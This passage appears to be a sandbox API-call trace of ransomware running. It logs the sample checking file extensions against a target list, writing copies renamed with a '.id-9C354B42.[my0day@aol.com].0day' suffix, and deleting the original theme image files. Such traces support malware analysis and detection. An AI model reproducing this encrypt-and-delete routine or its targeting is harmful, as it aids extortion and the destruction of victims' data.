[0046.474] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.474] lstrlenW (lpString=".doc") returned 4 [0046.474] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.474] lstrlenW (lpString=".docx") returned 5 [0046.474] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.474] lstrlenW (lpString=".pdf") returned 4 [0046.474] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.474] lstrlenW (lpString=".xls") returned 4 [0046.474] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.474] lstrlenW (lpString=".xlsx") returned 5 [0046.474] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.474] lstrlenW (lpString=".ppt") returned 4 [0046.474] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.475] lstrlenW (lpString=".zip") returned 4 [0046.475] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.475] lstrlenW (lpString=".rar") returned 4 [0046.475] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.475] lstrlenW (lpString=".bz2") returned 4 [0046.475] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.475] lstrlenW (lpString=".7z") returned 3 [0046.475] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.475] lstrlenW (lpString=".dbf") returned 4 [0046.475] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.475] lstrlenW (lpString=".1cd") returned 4 [0046.475] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0046.475] lstrlenW (lpString=".jpg") returned 4 [0046.475] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.475] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0046.475] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.476] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=15737) returned 1 [0046.476] CloseHandle (hObject=0x190) returned 1 [0046.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 0x20 [0046.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.476] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.476] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.476] GetLastError () returned 0x0 [0046.476] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x3d79, lpOverlapped=0x0) returned 1 [0046.478] WriteFile (in: hFile=0x174, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0046.479] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.479] WriteFile (in: hFile=0x174, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.479] SetEndOfFile (hFile=0x174) returned 1 [0046.479] CloseHandle (hObject=0x174) returned 1 [0046.479] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.479] SetEndOfFile (hFile=0x190) returned 1 [0046.480] CloseHandle (hObject=0x190) returned 1 [0046.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.480] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 1 [0046.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.481] lstrlenW (lpString=".doc") returned 4 [0046.481] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.481] lstrlenW (lpString=".docx") returned 5 [0046.481] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.481] lstrlenW (lpString=".pdf") returned 4 [0046.481] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.481] lstrlenW (lpString=".xls") returned 4 [0046.481] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.481] lstrlenW (lpString=".xlsx") returned 5 [0046.481] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.481] lstrlenW (lpString=".ppt") returned 4 [0046.481] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.481] lstrlenW (lpString=".zip") returned 4 [0046.481] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.481] lstrlenW (lpString=".rar") returned 4 [0046.481] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.481] lstrlenW (lpString=".bz2") returned 4 [0046.481] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.481] lstrlenW (lpString=".7z") returned 3 [0046.481] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.481] lstrlenW (lpString=".dbf") returned 4 [0046.481] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.481] lstrlenW (lpString=".1cd") returned 4 [0046.481] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.481] lstrlenW (lpString=".jpg") returned 4 [0046.481] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.481] lstrlenW (lpString=".doc") returned 4 [0046.481] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.482] lstrlenW (lpString=".docx") returned 5 [0046.482] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.482] lstrlenW (lpString=".pdf") returned 4 [0046.482] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.482] lstrlenW (lpString=".xls") returned 4 [0046.482] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.482] lstrlenW (lpString=".xlsx") returned 5 [0046.482] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.482] lstrlenW (lpString=".ppt") returned 4 [0046.482] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.482] lstrlenW (lpString=".zip") returned 4 [0046.482] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.482] lstrlenW (lpString=".rar") returned 4 [0046.482] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.482] lstrlenW (lpString=".bz2") returned 4 [0046.482] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.482] lstrlenW (lpString=".7z") returned 3 [0046.482] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.482] lstrlenW (lpString=".dbf") returned 4 [0046.482] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.482] lstrlenW (lpString=".1cd") returned 4 [0046.482] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0046.482] lstrlenW (lpString=".jpg") returned 4 [0046.482] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.482] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.482] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.483] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=3970) returned 1 [0046.483] CloseHandle (hObject=0x190) returned 1 [0046.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 0x20 [0046.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.483] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.483] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.298] GetLastError () returned 0x0 [0047.298] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xf82, lpOverlapped=0x0) returned 1 [0047.300] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf90, lpOverlapped=0x0) returned 1 [0047.300] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.301] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.301] SetEndOfFile (hFile=0x194) returned 1 [0047.301] CloseHandle (hObject=0x194) returned 1 [0047.301] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.301] SetEndOfFile (hFile=0x190) returned 1 [0047.302] CloseHandle (hObject=0x190) returned 1 [0047.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.302] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 1 [0047.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.302] lstrlenW (lpString=".doc") returned 4 [0047.302] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.302] lstrlenW (lpString=".docx") returned 5 [0047.303] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.303] lstrlenW (lpString=".pdf") returned 4 [0047.303] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.303] lstrlenW (lpString=".xls") returned 4 [0047.303] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.303] lstrlenW (lpString=".xlsx") returned 5 [0047.303] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.303] lstrlenW (lpString=".ppt") returned 4 [0047.303] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.303] lstrlenW (lpString=".zip") returned 4 [0047.303] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.303] lstrlenW (lpString=".rar") returned 4 [0047.303] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.303] lstrlenW (lpString=".bz2") returned 4 [0047.303] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.303] lstrlenW (lpString=".7z") returned 3 [0047.303] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.303] lstrlenW (lpString=".dbf") returned 4 [0047.303] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.303] lstrlenW (lpString=".1cd") returned 4 [0047.303] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.303] lstrlenW (lpString=".jpg") returned 4 [0047.303] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.303] lstrlenW (lpString=".doc") returned 4 [0047.303] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.303] lstrlenW (lpString=".docx") returned 5 [0047.304] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.304] lstrlenW (lpString=".pdf") returned 4 [0047.304] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.304] lstrlenW (lpString=".xls") returned 4 [0047.304] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.304] lstrlenW (lpString=".xlsx") returned 5 [0047.304] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.304] lstrlenW (lpString=".ppt") returned 4 [0047.304] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.304] lstrlenW (lpString=".zip") returned 4 [0047.304] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.304] lstrlenW (lpString=".rar") returned 4 [0047.304] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.304] lstrlenW (lpString=".bz2") returned 4 [0047.304] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.304] lstrlenW (lpString=".7z") returned 3 [0047.304] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.304] lstrlenW (lpString=".dbf") returned 4 [0047.304] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.304] lstrlenW (lpString=".1cd") returned 4 [0047.304] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0047.304] lstrlenW (lpString=".jpg") returned 4 [0047.304] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.304] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0047.304] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.305] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=937) returned 1 [0047.305] CloseHandle (hObject=0x190) returned 1 [0047.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 0x20 [0047.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.305] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.305] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.307] GetLastError () returned 0x0 [0047.307] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x3a9, lpOverlapped=0x0) returned 1 [0047.309] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x3b0, lpOverlapped=0x0) returned 1 [0047.310] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.310] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.310] SetEndOfFile (hFile=0x194) returned 1 [0047.310] CloseHandle (hObject=0x194) returned 1 [0047.310] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.310] SetEndOfFile (hFile=0x190) returned 1 [0047.311] CloseHandle (hObject=0x190) returned 1 [0047.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.311] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 1 [0047.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.311] lstrlenW (lpString=".doc") returned 4 [0047.311] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.311] lstrlenW (lpString=".docx") returned 5 [0047.311] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.311] lstrlenW (lpString=".pdf") returned 4 [0047.311] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.311] lstrlenW (lpString=".xls") returned 4 [0047.312] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.312] lstrlenW (lpString=".xlsx") returned 5 [0047.312] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.312] lstrlenW (lpString=".ppt") returned 4 [0047.312] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.312] lstrlenW (lpString=".zip") returned 4 [0047.312] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.312] lstrlenW (lpString=".rar") returned 4 [0047.312] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.312] lstrlenW (lpString=".bz2") returned 4 [0047.312] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.312] lstrlenW (lpString=".7z") returned 3 [0047.312] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.312] lstrlenW (lpString=".dbf") returned 4 [0047.312] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.312] lstrlenW (lpString=".1cd") returned 4 [0047.312] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.312] lstrlenW (lpString=".jpg") returned 4 [0047.312] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.312] lstrlenW (lpString="C:\\Program 